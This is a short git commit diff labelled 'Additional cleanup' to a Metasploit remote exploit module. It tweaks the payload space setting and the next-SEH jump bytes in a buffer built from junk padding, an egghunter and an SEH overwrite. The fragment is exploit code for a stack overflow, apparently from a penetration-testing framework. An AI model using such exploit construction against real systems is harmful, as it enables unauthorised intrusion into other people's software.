Additional cleanup
parent
7014322dfd
commit
49bcec5c92
|
@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => '4660',
|
||||
'Space' => 4660,
|
||||
'StackAdjustment' => -3500,
|
||||
'BadChars' => "\x00"
|
||||
},
|
||||
|
@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
buf = rand_text(target['Offset']-126) # junk to egghunter at jmp -128
|
||||
buf << hunter # egghunter
|
||||
buf << rand_text(target['Offset']-buf.length) # more junk to offset
|
||||
buf << "\xeb\x80\x90\x90" # nseh - jmp -128 to egghunter
|
||||
buf << "\xeb\x80" + rand_text(2) # nseh - jmp -128 to egghunter
|
||||
buf << [target.ret].pack("V*") # seh
|
||||
|
||||
# second last byte of payload/egg gets corrupted - pad 2 bytes
|
||||
|
|
Loading…
Reference in New Issue